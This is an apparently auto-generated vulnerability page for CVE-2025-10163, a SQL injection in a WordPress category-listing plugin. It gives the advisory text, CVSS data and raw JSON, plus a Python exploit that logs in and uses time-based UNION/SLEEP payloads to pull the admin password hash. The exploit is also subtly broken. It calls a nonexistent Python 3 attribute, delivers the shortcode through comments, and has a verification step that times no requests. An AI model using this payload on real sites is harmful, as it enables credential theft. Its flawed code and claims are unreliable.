Security Vulnerability Report
中文
CVE-2025-10163 CVSS 6.5 MEDIUM

CVE-2025-10163

Published: 2025-12-11 04:15:58
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the ‘starting_with’ parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

List category posts plugin for WordPress <= 0.91.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10163 PoC - WordPress List category posts SQL Injection # Authentication required: Contributor-level or higher # Target: WordPress site with List category posts plugin <= 0.91.0 import requests import time import string TARGET_URL = "https://vulnerable-site.com/" USERNAME = "attacker" PASSWORD = "password123" def get_wordpress_session(): """Login to WordPress and get session cookie""" session = requests.Session() login_url = TARGET_URL + "wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) return session def extract_admin_hash(session): """ Time-based blind SQL injection to extract admin password hash Uses SLEEP() function to infer character values """ admin_hash = "" charset = string.ascii_lowercase + string.digits + string.letters # SQL Injection payload template # This payload extracts the first character of user_pass from wp_users payload_template = "a' UNION SELECT IF(SUBSTRING(user_pass,{},1)='{}',SLEEP(5),0) FROM wp_users WHERE id=1-- " for position in range(1, 65): # WordPress MD5 hash is 32 chars for char in charset: # Create malicious shortcode shortcode = f"[catlist name='test' starting_with=\"{payload_template.format(position, char)}\"]" # Post comment with shortcode (Contributor can post comments) post_url = TARGET_URL + "wp-comments-post.php" comment_data = { "comment": shortcode, "submit": "Post Comment", "comment_post_ID": "1" } start_time = time.time() session.post(post_url, data=comment_data) elapsed = time.time() - start_time # If SLEEP(5) executed, response will be delayed by ~5 seconds if elapsed >= 4.5: admin_hash += char print(f"[*] Position {position}: {char} (hash: {admin_hash})") break return admin_hash def verify_vulnerability(session): """Verify the vulnerability exists by testing time-based injection""" # Normal query - should respond quickly normal_shortcode = "[catlist name='test' starting_with='a']" # Malicious query with SLEEP - should be delayed if vulnerable malicious_shortcode = "[catlist name='test' starting_with='a' AND (SELECT SLEEP(5))]x" # Test normal query start = time.time() # Simulate request (actual implementation would post to WordPress) elapsed_normal = time.time() - start # Test malicious query start = time.time() # Simulate request elapsed_malicious = time.time() - start if elapsed_malicious > elapsed_normal + 3: print("[+] Vulnerability confirmed: Time-based SQL injection works") return True else: print("[-] Vulnerability not confirmed or already patched") return False if __name__ == "__main__": print("[*] CVE-2025-10163 - WordPress List category posts SQL Injection") print("[*] Plugin: List category posts <= 0.91.0") session = get_wordpress_session() if verify_vulnerability(session): print("[*] Extracting admin password hash...") admin_hash = extract_admin_hash(session) print(f"[+] Admin hash extracted: {admin_hash}") else: print("[-] Target is not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10163", "sourceIdentifier": "[email protected]", "published": "2025-12-11T04:15:57.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The List category posts plugin for WordPress is vulnerable to time-based SQL Injection via the ‘starting_with’ parameter of the catlist shortcode in all versions up to, and including, 0.91.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/list-category-posts/tags/0.91.0/include/lcp-parameters.php#L240", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21708205-dd43-4b22-9151-bc6f882422cb?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.